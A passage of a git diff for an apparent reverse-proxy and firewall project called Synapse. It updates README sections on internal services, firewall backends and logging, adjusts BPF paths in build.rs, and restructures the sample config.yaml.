`--log-sending-enabled=false`), the following features are degraded: - **Threat Intelligence (Degraded)** - Basic threat intelligence still works for real-time blocking, but detailed threat analysis and historical data collection is limited - **Anomaly Detection** - Advanced anomaly detection capabilities are not available without access log data - **Metrics & Analytics** - Comprehensive metrics and analytics are not available without access log aggregation -- **BPF Statistics** - Statistics can still be collected locally but won't be sent to Gen0Sec API for centralized analysis +- **BPF Statistics** - Statistics can still be collected locally (XDP backend only) but won't be sent to Gen0Sec API for centralized analysis. Note: BPF statistics are not available when using nftables or iptables backends. - **TCP Fingerprinting** - Fingerprints can still be collected locally but won't be sent to Gen0Sec API for behavioral analysis ### CAPTCHA Protection @@ -442,6 +516,7 @@ Features: - **Token-based validation** - JWT-signed tokens for secure validation - **Configurable TTL** - Customizable token and cache expiration times - **Redis caching** - Efficient caching of validation results +- **Internal services endpoint** - CAPTCHA verification via `/cgi-bin/captcha/verify` endpoint ### Content Scanning @@ -463,86 +538,97 @@ Synapse supports [PROXY protocol](./docs/PROXY_PROTOCOL.md) for preserving clien - **Configurable timeout** - Customizable timeout for PROXY protocol parsing - **Load balancer integration** - Works with HAProxy, AWS ALB, and other load balancers -### Health Check Endpoints +### Internal Services Server -Synapse provides comprehensive health monitoring capabilities with a dedicated health check server: +Synapse provides a unified internal services server for CAPTCHA verification, ACME challenges, and certificate management: #### Features -- **Separate port** - Health checks run on a dedicated port independent of main proxy traffic -- **Configurable endpoint** - Customizable health check path (default: `/health`) -- **Multiple HTTP methods** - Support for GET, HEAD, and other HTTP methods -- **CIDR filtering** - Restrict health check access to specific IP ranges for security -- **JSON response** - Structured health status with timestamp and service information -- **Environment variable configuration** - Full runtime configuration via environment variables +- **Unified server** - Single HTTP server for all internal services +- **Localhost binding** - Binds to 127.0.0.1 by default for security +- **Configurable port** - Customizable port (default: 9180) +- **Multiple endpoints** - Health checks, CAPTCHA verification, ACME challenges, certificate management + +#### Available Endpoints + +- `GET /health` - Health check endpoint +- `POST /cgi-bin/captcha/verify` - CAPTCHA verification (requires captcha configuration) +- `GET /.well-known/acme-challenge/*` - ACME HTTP-01 challenges (requires ACME enabled) +- `GET /cert/expiration` - Check all certificate expiration status +- `GET /cert/expiration/:domain` - Check specific certificate status +- `POST /cert/renew/:domain` - Manually trigger certificate renewal #### Configuration **YAML Configuration:** ```yaml -server: - health_check: - enabled: true # Enable/disable health check server - endpoint: "/health" # Health check endpoint path - port: "0.0.0.0:8080" # Health check server bind address - methods: ["GET", "HEAD"] # Allowed HTTP methods - allowed_cidrs: [] # CIDR restrictions (empty = allow all) +proxy: + internal_services: + enabled: true # Enable/disable internal services server + port: 9180 # Port to bind to + bind_ip: "127.0.0.1" # IP address to bind to (default: localhost) ``` **Environment Variables:** ```bash -AX_SERVER_HEALTH_CHECK_ENABLED=true -AX_SERVER_HEALTH_CHECK_ENDPOINT=/health -AX_SERVER_HEALTH_CHECK_PORT=0.0.0.0:8080 -AX_SERVER_HEALTH_CHECK_METHODS=GET,HEAD -AX_SERVER_HEALTH_CHECK_ALLOWED_CIDRS=127.0.0.0/8,::1/128 +INTERNAL_SERVICES_ENABLED=true +INTERNAL_SERVICES_PORT=9180 +INTERNAL_SERVICES_BIND_IP=127.0.0.1 ``` #### Usage Examples -**Basic health check:** +**Health check:** ```bash -curl http://localhost:8080/health +curl http://127.0.0.1:9180/health ``` -**Response format:** -```json -{ - "status": "healthy", - "timestamp": "2024-01-01T12:00:00Z", - "service": "synapse" -} +**Check certificate expiration:** +```bash +curl http://127.0.0.1:9180/cert/expiration +curl http://127.0.0.1:9180/cert/expiration/example.com ``` -**HEAD request (for load balancers):** +**Manually renew certificate:** ```bash -curl -I http://localhost:8080/health +curl -X POST http://127.0.0.1:9180/cert/renew/example.com ``` -**Restricted access (only localhost):** -```yaml -server: - health_check: - allowed_cidrs: ["127.0.0.0/8", "::1/128"] -``` +### Multi-Backend Firewall -#### Load Balancer Integration +Synapse supports multiple firewall backends with automatic fallback: -Health checks are designed for seamless integration with load balancers: +- **XDP/BPF backend** - Ultra-low latency kernel-space filtering (highest performance) +- **nftables backend** - Modern netfilter framework (fallback when XDP unavailable) +- **iptables backend** - Legacy netfilter framework (compatibility fallback) +- **Userland backend** - Application-level enforcement (no kernel firewall) +- **Automatic selection** - Auto mode selects best available backend (XDP > nftables > iptables > none) +- **Multiple interfaces** - Support for attaching to multiple network interfaces +- **IP version filtering** - Configure IPv4 only, IPv6 only, or both -- **Kubernetes** - Use for liveness and readiness probes -- **Docker Swarm** - Health check endpoint for service discovery -- **AWS ALB/NLB** - Target group health checks -- **HAProxy** - Backend server health monitoring -- **Nginx** - Upstream health checks +> **⚠️ Warning**: When using nftables or iptables backends (instead of XDP), BPF statistics collection is **not available**. This means packet processing metrics, dropped IP tracking, and statistics will not be collected or displayed on the dashboard. Only the XDP/BPF backend provides BPF statistics functionality. -### XDP Packet Filtering +#### Configuration -Synapse uses eXpress Data Path (XDP) for ultra-low latency packet filtering: +**YAML Configuration:** +```yaml +firewall: + mode: "auto" # auto, xdp, nftables, iptables, none + disable_xdp: false + +network: + iface: "eth0" # Single interface + ifaces: ["eth0", "eth1"] # Multiple interfaces (overrides iface) + ip_version: "both" # ipv4, ipv6, or both +``` -- **Kernel-space filtering** - Packet filtering happens in kernel space for maximum performance -- **BPF programs** - Custom Berkeley Packet Filter programs for advanced filtering -- **Multiple interfaces** - Support for attaching to multiple network interfaces -- **Fallback mode** - Can run without XDP for environments that don't support it +**Environment Variables:** +```bash +FIREWALL_MODE=auto +FIREWALL_DISABLE_XDP=false +NETWORK_IFACE=eth0 +NETWORK_IFACES=eth0,eth1 +NETWORK_IP_VERSION=both +``` ### BPF Statistics and Monitoring @@ -555,6 +641,14 @@ Comprehensive kernel-level statistics collection: - **Periodic logging** - Configurable intervals for statistics and event logging - **Event streaming** - Send statistics to Gen0Sec API for analysis +> **⚠️ Important**: BPF statistics **only work with the XDP/BPF firewall backend**. When Synapse falls back to nftables or iptables (due to XDP being unavailable or disabled), BPF statistics collection is disabled. This means: +> - No packet processing metrics will be collected +> - No dropped IP tracking will be available +> - Statistics will not appear on the Gen0Sec dashboard +> - Metrics and analytics will be unavailable +> +> To enable BPF statistics, ensure XDP is available and enabled (`firewall.disable_xdp: false` and `firewall.mode: "auto"` or `"xdp"`). + ### TCP Fingerprinting Advanced TCP-level fingerprinting capabilities: @@ -577,25 +671,81 @@ Efficient event handling with unified queue: - **Memory efficient** - Events are processed in batches to minimize memory overhead - **Non-blocking** - Event processing happens in background tasks without blocking main proxy +### File Logging + +Comprehensive file-based logging with automatic rotation: + +- **Separate log files** - Error logs, application logs, and access logs in separate files +- **Automatic rotation** - Log files rotate when they reach the configured maximum size +- **Gzip compression** - Rotated log files are automatically compressed +- **Configurable retention** - Control how many rotated log files to keep +- **Directory management** - Log directory is created automatically if it doesn't exist + +**Configuration:** +```yaml +logging: + file_logging_enabled: true + log_directory: "/var/log/synapse" + max_log_size: 104857600 # 100MB + log_file_count: 10 # Keep 10 rotated files +``` + +**Log Files Created:** +- `error.log` - ERROR level logs only +- `app.log` - All application logs (info, warn, error, debug, trace) +- `access.log` - HTTP access logs in JSON format (proxy mode only) +- `error.1.log.gz`, `error.2.log.gz`, etc. - Rotated/compressed error logs +- `app.1.log.gz`, `app.2.log.gz`, etc. - Rotated/compressed app logs +- `access.1.log.gz`, `access.2.log.gz`, etc. - Rotated/compressed access logs + +### Syslog Integration + +Centralized logging via syslog: + +- **Multiple facilities** - Support for daemon, local0-7, user, syslog facilities +- **Per-log-type priorities** - Different syslog priority levels for error, app, and access logs +- **Automatic connection** - Tries unix socket, then TCP, then UDP for syslog connection +- **Configurable identifier** - Custom syslog tag/identifier + +**Configuration:** +```yaml +logging: + syslog: + enabled: true + facility: "daemon" # daemon, local0-7, user, syslog + identifier: "synapse" + levels: + error: "err" # emerg, alert, crit, err, warning, notice, info, debug + app: "info" + access: "info" +``` + ### TLS Management Comprehensive TLS support with multiple modes: - **ACME integration** - Automatic certificate management with Let's Encrypt +- **HTTP-01 challenges** - Standard HTTP-based certificate validation +- **DNS-01 challenges** - DNS-based validation for wildcard certificates +- **Automatic wildcard detection** - Automatically uses DNS-01 for wildcard domains - **Custom certificates** - Support for your own TLS certificates - **HTTP-only mode** - Run without TLS for internal networks - **TLS enforcement** - Force HTTPS with HTTP upgrade responses +- **Certificate expiration monitoring** - Check and renew certificates automatically +- **Manual renewal** - Trigger certificate renewal via internal services API ## Architecture ### Components -- **XDP Filter** - Kernel-space packet filtering using eBPF -- **HTTP Server** - Handles ACME challenges, HTTP traffic, and health checks +- **Multi-Backend Firewall** - XDP/nftables/iptables/userland packet filtering +- **HTTP Server** - Handles HTTP traffic and proxy requests - **TLS Server** - Manages HTTPS connections and certificate handling +- **Internal Services Server** - Unified server for CAPTCHA, ACME challenges, and certificate management - **Reverse Proxy** - Forwards requests to upstream services -- **Upstreams Manager** - Advanced routing with service discovery and hot-reloading -- **Threat Intelligence** - Integrates with Gen0Sec API for real-time threat data +- **Upstreams Manager** - Advanced routing with service discovery, weighted load balancing, and hot-reloading +- **Threat Intelligence** - Integrates with Gen0Sec API and Threat MMDB for real-time threat data +- **GeoIP Manager** - Country, ASN, and city-level geolocation using MMDB databases - **Access Rules Engine** - Dynamic IP allow/block lists with periodic updates from Gen0Sec API - **BPF Statistics Collector** - Tracks packet processing, drops, and banned IP hits at kernel level - **TCP Fingerprint Collector** - Extracts and analyzes TCP SYN fingerprints for behavioral analysis @@ -608,7 +758,9 @@ Comprehensive TLS support with multiple modes: - **JA4X** X.509 certificate fingerprinting - **CAPTCHA Engine** - Validates CAPTCHA responses from multiple providers - **Content Scanner** - ClamAV integration for malware detection - +- **ACME Manager** - HTTP-01 and DNS-01 challenge handling for certificate management +- **File Logger** - Rotating file-based logging with compression +- **Syslog Logger** - Centralized logging via syslog - **Event Queue** - Unified batch processing for logs, statistics, and events - **Redis Cache** - Stores certificates, threat intelligence, CAPTCHA validation results, and content scan results @@ -622,17 +774,27 @@ Comprehensive TLS support with multiple modes: ## Notes -- The `--upstream` option is always required for request forwarding +- **Mode configuration**: Use `mode: "proxy"` or `mode: "agent"` to control application mode +- **Configuration sections**: Use `platform` for Gen0Sec configuration, `proxy` for proxy configuration +- **Environment variables**: Use format without `AX_` prefix (e.g., `API_KEY`, `BASE_URL`, `LOGGING_LEVEL`) +- **Firewall backends**: Automatic fallback from XDP to nftables to iptables to userland based on availability +- **IP version support**: Configure `network.ip_version` to filter IPv4 only, IPv6 only, or both +- **Threat MMDB**: Local MaxMind database for offline threat intelligence (auto-updated from download server) +- **GeoIP MMDB**: Country, ASN, and city databases for geolocation (auto-updated from download server) +- **ACME challenges**: DNS-01 challenge automatically used for wildcard domains, HTTP-01 for regular domains +- **Internal services**: Unified server on port 9180 (default) for CAPTCHA, ACME, and certificate management +- **File logging**: Automatic rotation and gzip compression when `file_logging_enabled: true` +- **Syslog integration**: Optional syslog output with configurable facility and identifier +- **Upstream timeouts**: Per-path timeout configuration (connection, read, write, idle) for fine-grained control +- **SSL/TLS options**: `ssl_enabled` controls upstream HTTPS, `force_https` redirects HTTP to HTTPS - When TLS mode is `disabled`, Synapse runs as an HTTP proxy + firewall - When TLS mode is `custom` or `acme`, Synapse runs as an HTTPS proxy + firewall -- `--tls-only` mode enforces TLS requirements: non-SSL requests return 426 Upgrade Required (except ACME challenges) -- For custom TLS mode, both `--tls-cert-path` and `--tls-key-path` are required - Domain filtering supports exact matches (whitelist) - When using Docker, ensure the required capabilities (`SYS_ADMIN`, `BPF`, `NET_ADMIN`) are added -- The XDP program attaches to the specified network interface for packet filtering -- BPF statistics and TCP fingerprinting require XDP to be enabled (not available with `--disable-xdp`) +- The XDP program attaches to the specified network interface(s) for packet filtering +- **BPF statistics and TCP fingerprinting require XDP to be enabled** - These features are **not available** when using nftables or iptables backends. If XDP is unavailable or disabled (`firewall.disable_xdp: true`), BPF statistics will not be collected and metrics will not appear on the dashboard. - Access rules are automatically updated from Gen0Sec API at regular intervals -- BPF statistics track packet processing metrics and dropped IPs at kernel level +- BPF statistics track packet processing metrics and dropped IPs at kernel level (XDP backend only) - TCP fingerprinting collects SYN packet characteristics for behavioral analysis - Fingerprinting supports the complete JA4+ suite: - JA4 generates fingerprints from TLS ClientHello messages @@ -646,12 +808,14 @@ Comprehensive TLS support with multiple modes: - Multiple network interfaces can be configured for high availability setups - Content scanning requires a running ClamAV server and is disabled by default - PROXY protocol support enables proper client IP preservation through load balancers -- Health check endpoints can be configured for monitoring and load balancer integration - Access logs, statistics, and events are batched and sent to Gen0Sec API for analysis - Configuration priority: YAML file > Command line arguments > Environment variables - Upstreams configuration supports hot-reloading - changes apply immediately without restart - Service discovery providers: file (static), Consul, and Kubernetes -- Gen0Sec paths are global paths that work across all hostnames and are evaluated before hostname-specific routing +- Internal paths are global paths that work across all hostnames and are evaluated before hostname-specific routing +- Weighted load balancing uses Pingora's Weighted algorithm for proportional traffic distribution +- Server weights can be configured using object format (`{address: "host:port", weight: N}`) or simple string format (default weight = 1) +- Headers are separated into `request_headers` (sent to upstream) and `response_headers` (sent to clients) for better control ## Thank you! [Cloudflare](https://github.com/cloudflare) for Pingora and Wirefilter diff --git a/build.rs b/build.rs index ea50476..e69aed2 100644 --- a/build.rs +++ b/build.rs @@ -1,16 +1,16 @@ // build.rs use std::env; -#[cfg(unix)] +#[cfg(all(unix, feature = "bpf"))] use std::ffi::OsStr; -#[cfg(unix)] +#[cfg(all(unix, feature = "bpf"))] use std::path::{Path, PathBuf}; #[cfg(all(unix, feature = "bpf"))] use libbpf_cargo::SkeletonBuilder; -const SRC: &str = "src/bpf/filter.bpf.c"; -const HEADER_DIR: &str = "src/bpf"; +const SRC: &str = "src/security/firewall/bpf/filter.bpf.c"; +const HEADER_DIR: &str = "src/security/firewall/bpf"; fn main() { println!("cargo:rerun-if-changed={}", SRC); @@ -24,14 +24,18 @@ fn main() { #[cfg(not(unix))] { if bpf_enabled { - println!("cargo:warning=BPF feature enabled but target is not unix; skipping BPF skeleton generation"); + println!( + "cargo:warning=BPF feature enabled but target is not unix; skipping BPF skeleton generation" + ); } return; } #[cfg(unix)] if !bpf_enabled { - println!("cargo:warning=BPF support disabled at build time; skipping BPF skeleton generation"); + println!( + "cargo:warning=BPF support disabled at build time; skipping BPF skeleton generation" + ); return; } @@ -59,10 +63,9 @@ fn main() { OsStr::new("-Wall"), OsStr::new("-Wextra"), OsStr::new("-DBPF_NO_PRESERVE_ACCESS_INDEX"), // Older clang compat - OsStr::new("-Ubpf"), // Avoid macro collision + OsStr::new("-Ubpf"), // Avoid macro collision ]) .build_and_generate(skel_path.to_str().expect("Invalid UTF-8 in path")) .expect("Failed to generate skeleton"); } } - diff --git a/config/config.yaml b/config/config.yaml index d366bc5..5518cdc 100644 --- a/config/config.yaml +++ b/config/config.yaml @@ -11,17 +11,19 @@ # - WORKER_THREADS (number of worker threads when multi_thread is enabled) # - REDIS_URL, REDIS_PREFIX # - REDIS_SSL_CA_CERT_PATH, REDIS_SSL_CLIENT_CERT_PATH, REDIS_SSL_CLIENT_KEY_PATH, REDIS_SSL_INSECURE -# - NETWORK_IFACE, NETWORK_IFACES (comma-separated), NETWORK_DISABLE_XDP, NETWORK_IP_VERSION -# - FIREWALL_MODE (auto, xdp, nftables, iptables, none) +# - NETWORK_IFACE, NETWORK_IFACES (comma-separated), NETWORK_IP_VERSION +# - FIREWALL_MODE (auto, xdp, nftables, iptables, none), FIREWALL_DISABLE_XDP # - API_KEY, BASE_URL, LOG_SENDING_ENABLED (platform configuration) -# - LOGGING_LEVEL +# - LOGGING_LEVEL, LOGGING_FILE_ENABLED, LOGGING_DIRECTORY, LOGGING_MAX_FILE_SIZE, LOGGING_FILE_COUNT +# - LOGGING_SYSLOG_ENABLED, LOGGING_SYSLOG_FACILITY, LOGGING_SYSLOG_IDENTIFIER # - CONTENT_SCANNING_ENABLED, CLAMAV_SERVER, CONTENT_MAX_FILE_SIZE # - CONTENT_SCAN_CONTENT_TYPES, CONTENT_SKIP_EXTENSIONS, CONTENT_SCAN_EXPRESSION # - CAPTCHA_SITE_KEY, CAPTCHA_SECRET_KEY, CAPTCHA_JWT_SECRET # - CAPTCHA_PROVIDER, CAPTCHA_TOKEN_TTL, CAPTCHA_CACHE_TTL +# - INTERNAL_SERVICES_ENABLED, INTERNAL_SERVICES_PORT, INTERNAL_SERVICES_BIND_IP # - PROXY_PROTOCOL_ENABLED, PROXY_PROTOCOL_TIMEOUT # - DAEMON_ENABLED, DAEMON_PID_FILE, DAEMON_WORKING_DIRECTORY -# - DAEMON_STDOUT, DAEMON_STDERR, DAEMON_USER, DAEMON_GROUP, DAEMON_CHOWN_PID_FILE +# - DAEMON_USER, DAEMON_GROUP, DAEMON_CHOWN_PID_FILE # # Backward compatibility: AX_ prefix and AX_ARXIGNIS_ prefix are still supported # but will log deprecation warnings. @@ -30,36 +32,7 @@ # Application operating mode # - agent: Only access rules and monitoring (no proxy, pingora disabled) # - proxy: Full reverse proxy functionality (default) -mode: "proxy" - -# Multi-thread runtime configuration -# - true: Use multi-threaded Tokio runtime (better for proxy mode with high concurrency) -# - false: Use single-threaded runtime (lower memory, better for agent mode) -# Default: false for agent mode, true for proxy mode -# multi_thread: true - -# Number of worker threads when multi_thread is enabled -# Default: number of CPU cores -# worker_threads: 4 - -# Redis Configuration -redis: - # Redis connection URL for ACME cache storage - url: "redis://127.0.0.1/0" - - # Namespace prefix for Redis ACME cache entries - prefix: "g0s:synapse" - - # Redis SSL/TLS configuration (optional) - # ssl: - # # Path to CA certificate file (PEM format) - # ca_cert_path: "/path/to/ca.crt" - # # Path to client certificate file (PEM format, optional, for mutual TLS) - # client_cert_path: "/path/to/client.crt" - # # Path to client private key file (PEM format, optional, for mutual TLS) - # client_key_path: "/path/to/client.key" - # # Skip certificate verification (for testing with self-signed certs) - # insecure: false +mode: "agent" # Network Configuration network: @@ -69,17 +42,6 @@ network: # Additional network interfaces for XDP attach (overrides iface if set) ifaces: [] - # Disable XDP packet filtering (run without BPF/XDP) - disable_xdp: false - - # Firewall backend mode: auto, xdp, nftables, iptables, none - # - auto: Automatically select best available (XDP > nftables > iptables > none) - # - xdp: Force XDP/BPF backend (highest performance, requires kernel support) - # - nftables: Force nftables backend (requires nft command and kernel support) - # - iptables: Force iptables backend (legacy, most compatible) - # - none: Disable kernel firewall, userland enforcement only - firewall_mode: "auto" - # IP version support mode: "ipv4", "ipv6", or "both" (default: "both") # Note: XDP requires IPv6 to be enabled at kernel level for attachment, # even in IPv4-only mode. This is a kernel limitation. When set to "ipv4", @@ -91,6 +53,19 @@ network: # - "both": Process both IPv4 and IPv6 packets (default) ip_version: "both" +# Firewall Configuration +firewall: + # Firewall backend mode: auto, xdp, nftables, iptables, none + # - auto: Automatically select best available (XDP > nftables > iptables > none) + # - xdp: Force XDP/BPF backend (highest performance, requires kernel support) + # - nftables: Force nftables backend (requires nft command and kernel support) + # - iptables: Force iptables backend (legacy, most compatible) + # - none: Disable kernel firewall, userland enforcement only + mode: "auto" + + # Disable XDP packet filtering (run without BPF/XDP) + disable_xdp: false + # Gen0Sec Platform Configuration # Note: 'arxignis' is also accepted for backward compatibility but deprecated platform: @@ -109,7 +84,7 @@ platform: # Maximum size for request/response bodies in access logs (bytes) - Don't override in Basic plan that's the maximum allowed by the plan. max_body_size: 1048576 - # Threat MMDB Configuration + # Threat MMDB Configuration (used by platform threat intelligence) threat: # URL to download Threat MMDB file # Base URL for Threat MMDB files (version.txt and MMDB files are at this base URL) @@ -125,135 +100,101 @@ platform: # Threat MMDB refresh interval in seconds (default: 300 = 5 minutes) refresh_secs: 300 - # Captcha Configuration - captcha: - # Captcha site key for security verification - site_key: null - - # Captcha secret key for security verification - secret_key: null - - # JWT secret key for captcha token signing - openssl rand -base64 48 - jwt_secret: null - - # Captcha provider: hcaptcha, recaptcha, turnstile - provider: "hcaptcha" - - # Captcha token TTL in seconds - token_ttl: 7200 - - # Captcha validation cache TTL in seconds - cache_ttl: 300 - -# GeoIP MMDB Configuration -geoip: - # Country database configuration - country: - # URL to download GeoIP Country MMDB file - url: "https://github.com/gen0sec/geoip-databases/raw/download/ipinfo_lite.mmdb" - # Local path to GeoIP Country MMDB file (full path) or directory prefix - # Full path example: /var/cache/synapse/ipinfo_lite.mmdb - # Directory prefix example: /var/lib/synapse (will use ipinfo_lite.mmdb) - path: "/var/lib/synapse" - # Custom headers to add to download requests (optional) - # Example: {"Authorization": "Bearer token", "X-Custom-Header": "value"} - headers: null - - # ASN database configuration - asn: - # URL to download GeoIP ASN MMDB file - url: "https://github.com/gen0sec/geoip-databases/raw/download/GeoLite2-ASN.mmdb" - # Local path to GeoIP ASN MMDB file (full path) or directory prefix - # Full path example: /var/cache/synapse/GeoLite2-ASN.mmdb - # Directory prefix example: /var/lib/synapse (will use GeoLite2-ASN.mmdb) - path: "/var/lib/synapse" - # Custom headers to add to download requests (optional) - # Example: {"Authorization": "Bearer token", "X-Custom-Header": "value"} - headers: null - - # City database configuration - city: - # URL to download GeoIP City MMDB file - url: "https://github.com/gen0sec/geoip-databases/raw/download/GeoLite2-City.mmdb" - # Local path to GeoIP City MMDB file (full path) or directory prefix - # Full path example: /var/cache/synapse/GeoLite2-City.mmdb - # Directory prefix example: /var/lib/synapse (will use GeoLite2-City.mmdb) - path: "/var/lib/synapse" - # Custom headers to add to download requests (optional) - # Example: {"Authorization": "Bearer token", "X-Custom-Header": "value"} - headers: null - - # GeoIP MMDB refresh interval in seconds (default: 28800 = 8 hours) - refresh_secs: 28800 - -# Content Scanning -content_scanning: - # Enable or disable content scanning - enabled: false - - # ClamAV server address - clamav_server: "localhost:3310" - - # Maximum file size to scan in bytes (10MB) - max_file_size: 10485760 - - # Content types to scan (empty means scan all) - scan_content_types: - - "text/html" - - "application/x-www-form-urlencoded" - - "multipart/form-data" - - "application/json" - - "text/plain" - - # Skip scanning for specific file extensions - skip_extensions: [] - - # Wirefilter expression to determine when to scan content - # Default: scan POST and PUT requests - # Examples: - # - "http.request.method eq \"POST\" or http.request.method eq \"PUT\"" - # - "http.request.method eq \"POST\" and http.request.path contains \"/upload\"" - # - "http.request.content_type contains \"multipart/form-data\"" - scan_expression: "http.request.method eq \"POST\" or http.request.method eq \"PUT\"" - # Logging Configuration logging: # Log level: error, warn, info, debug, trace level: "info" -# BPF Statistics Configuration -bpf_stats: - # Enable BPF statistics collection - enabled: true + # Enable file-based logging with separate files for errors and access logs + # When enabled, logs will be written to separate files with automatic rotation and gzip compression + # When disabled, logs will be written to console/stdout/stderr (backwards compatible) + file_logging_enabled: true + + # Directory for log files (created automatically if it doesn't exist) + log_directory: "/var/log/synapse" + + # Maximum size for each log file before rotation (in bytes) + # Default: 104857600 (100MB) + max_log_size: 104857600 + + # Number of rotated log files to keep (older files are deleted) + # Rotated files are automatically compressed with gzip (.gz extension) + # Default: 10 + log_file_count: 10 + + # Syslog Configuration (optional) + syslog: + # Enable syslog output + enabled: false + + # Syslog facility: daemon, local0-7, user, etc. + facility: "daemon" + + # Syslog identifier/tag + identifier: "synapse" + + # Per-log-type syslog configuration + # Each log type can have different syslog priority levels + levels: + # Error log syslog priority (emerg, alert, crit, err, warning, notice, info, debug) + error: "err" + + # Application log syslog priority + app: "info" + + # Access log syslog priority (proxy mode only) + access: "info" + + # When file_logging_enabled is true, the following log files will be created: + # - error.log: Only ERROR level logs + # - error.1.log.gz, error.2.log.gz, etc.: Rotated/compressed error logs + # - app.log: All application logs (info, warn, error, debug, trace) + # - app.1.log.gz, app.2.log.gz, etc.: Rotated/compressed app logs + # - access.log: HTTP access logs in JSON format (proxy mode only) + # - access.1.log.gz, access.2.log.gz, etc.: Rotated/compressed access logs + # + # Environment variable overrides: + # - LOGGING_FILE_ENABLED (true/false) + # - LOGGING_DIRECTORY (path) + # - LOGGING_MAX_FILE_SIZE (bytes) + # - LOGGING_FILE_COUNT (number) + # - LOGGING_SYSLOG_ENABLED (true/false) + # - LOGGING_SYSLOG_FACILITY (facility name) + # - LOGGING_SYSLOG_IDENTIFIER (identifier string) + + # BPF Statistics Logging + bpf_stats: + # Enable BPF statistics collection + enabled: true - # Log statistics every N seconds - log_interval_secs: 60 + # Log statistics every N seconds + log_interval_secs: 60 - # Enable separate dropped IP events logging - enable_dropped_ip_events: true + # Enable separate dropped IP events logging + enable_dropped_ip_events: true - # Log dropped IP events every N seconds (separate from general stats) - dropped_ip_events_interval_secs: 30 + # Log dropped IP events every N seconds (separate from general stats) + dropped_ip_events_interval_secs: 30 -# TCP Fingerprinting Configuration -tcp_fingerprint: - # Enable TCP fingerprinting - enabled: true + # TCP Fingerprinting Logging + tcp_fingerprint: + # Enable TCP fingerprinting + enabled: true - # Log TCP fingerprinting statistics every N seconds - log_interval_secs: 60 + # Log TCP fingerprinting statistics every N seconds + log_interval_secs: 60 - # Enable separate TCP fingerprint events logging - enable_fingerprint_events: true + # Enable separate TCP fingerprint events logging + enable_fingerprint_events: true - # Log TCP fingerprint events every N seconds (separate from general stats) - fingerprint_events_interval_secs: 30 + # Log TCP fingerprint events every N seconds (separate from general stats) + fingerprint_events_interval_secs: 30 - # Minimum packet count to include in events (reduces noise from single-packet scans) - min_packet_count: 3 + # Minimum packet count to include in events (reduces noise from single-packet scans) + min_packet_count: 3 - # Minimum connection duration in seconds to include in events - min_connection_duration_secs: 1 + # Minimum connection duration in seconds to include in events + min_connection_duration_secs: 1 # Daemon Configuration daemon: @@ -266,12 +207,6 @@ daemon: # Working directory for daemon working_directory: "/var/lib/synapse" - # Stdout log file (application logs: info, debug, warn, error) - stdout: "/var/log/synapse/access.log" - - # Stderr log file (panic messages and system errors) - stderr: "/var/log/synapse/error.log" - # User to run daemon as (optional, e.g., "nobody") user: root @@ -281,81 +216,196 @@ daemon: # Change ownership of PID file to daemon user/group chown_pid_file: true -# Pingora Proxy System Configuration (old proxy system for upstreams) -# These settings enable the pingora-based proxy with multiple upstreams -pingora: - # Pingora HTTP proxy bind address - proxy_address_http: "0.0.0.0:80" +# Proxy Configuration (proxy mode features) +# Note: 'pingora' is also accepted for backward compatibility but deprecated +proxy: + # HTTP proxy bind address + address_http: "0.0.0.0:80" - # Optional: Pingora TLS proxy bind address - proxy_address_tls: "0.0.0.0:443" + # Optional: TLS proxy bind address + address_tls: "0.0.0.0:443" - # Mandatory if proxy_address_tls is set (cert files: {NAME}.crt, {NAME}.key) - proxy_certificates: "/etc/synapse/certs" + # Mandatory if address_tls is set (cert files: {NAME}.crt, {NAME}.key) + certificates: "/etc/synapse/certs" # TLS suite grade (high, medium, unsafe) - proxy_tls_grade: "medium" + tls_grade: "medium" # Default fallback SSL certificate name (file stem without extension, e.g., "default" for default.crt) # If not specified, the first valid certificate will be used as default default_certificate: "default" - # Path to upstreams configuration file - upstreams_conf: "/etc/synapse/upstreams.yaml" - - # HTTP API address for remote config updates - config_address: "0.0.0.0:3000" - - # Enable remote config push capability - config_api_enabled: false - - # Master key for API access - master_key: "00000000-0000-0000-0000-000000000000" - - # Log level for old proxy system - log_level: "info" - - # Health check method (HEAD, GET, POST) - healthcheck_method: "HEAD" - - # Health check interval in seconds - healthcheck_interval: 2 + # Redis Configuration (for ACME certificate storage) + redis: + # Redis connection URL for ACME cache storage + url: "redis://127.0.0.1/0" + + # Namespace prefix for Redis ACME cache entries + prefix: "g0s:synapse" + + # Redis SSL/TLS configuration (optional) + # ssl: + # # Path to CA certificate file (PEM format) + # ca_cert_path: "/path/to/ca.crt" + # # Path to client certificate file (PEM format, optional, for mutual TLS) + # client_cert_path: "/path/to/client.crt" + # # Path to client private key file (PEM format, optional, for mutual TLS) + # client_key_path: "/path/to/client.key" + # # Skip certificate verification (for testing with self-signed certs) + # insecure: false + + # Upstream Configuration + upstream: + # Path to upstreams configuration file + conf: "/etc/synapse/upstreams.yaml" + + # Health check configuration + healthcheck: + # Health check method (HEAD, GET, POST) + method: "HEAD" + # Health check interval in seconds + interval: 2 # PROXY protocol configuration - proxy_protocol: + protocol: # Enable PROXY protocol parsing (required when behind a load balancer that sends PROXY headers) enabled: true # Timeout for reading PROXY protocol header in milliseconds timeout_ms: 1000 + # GeoIP MMDB Configuration (proxy mode only) + geoip: + # Country database configuration + country: + # URL to download GeoIP Country MMDB file + url: "https://github.com/gen0sec/geoip-databases/raw/download/ipinfo_lite.mmdb" + # Local path to GeoIP Country MMDB file (full path) or directory prefix + path: "/var/lib/synapse" + headers: null + + # ASN database configuration + asn: + # URL to download GeoIP ASN MMDB file + url: "https://github.com/gen0sec/geoip-databases/raw/download/GeoLite2-ASN.mmdb" + # Local path to GeoIP ASN MMDB file (full path) or directory prefix + path: "/var/lib/synapse" + headers: null + + # City database configuration + city: + # URL to download GeoIP City MMDB file + url: "https://github.com/gen0sec/geoip-databases/raw/download/GeoLite2-City.mmdb" + # Local path to GeoIP City MMDB file (full path) or directory prefix + path: "/var/lib/synapse" + headers: null + + # GeoIP MMDB refresh interval in seconds (default: 28800 = 8 hours) + refresh_secs: 28800 + + # Captcha Configuration (proxy mode only) + captcha: + # Captcha site key for security verification + site_key: null -# ACME Configuration (Let's Encrypt certificate management) -acme: - # Enable embedded ACME server for automatic certificate management - enabled: true + # Captcha secret key for security verification + secret_key: null - # Port for ACME server (for HTTP-01 challenges) - # The server always binds to 127.0.0.1 (localhost only) for security - port: 9180 + # JWT secret key for captcha token signing - openssl rand -base64 48 + jwt_secret: null - # Email address for Let's Encrypt account registration - # Required for certificate issuance - email: null + # Captcha provider: hcaptcha, recaptcha, turnstile + provider: "hcaptcha" + + # Captcha token TTL in seconds + token_ttl: 7200 - # Storage type: "file" or "redis" - # If not set, defaults to "file" or "redis" (if redis_url is set) - storage_type: null + # Captcha validation cache TTL in 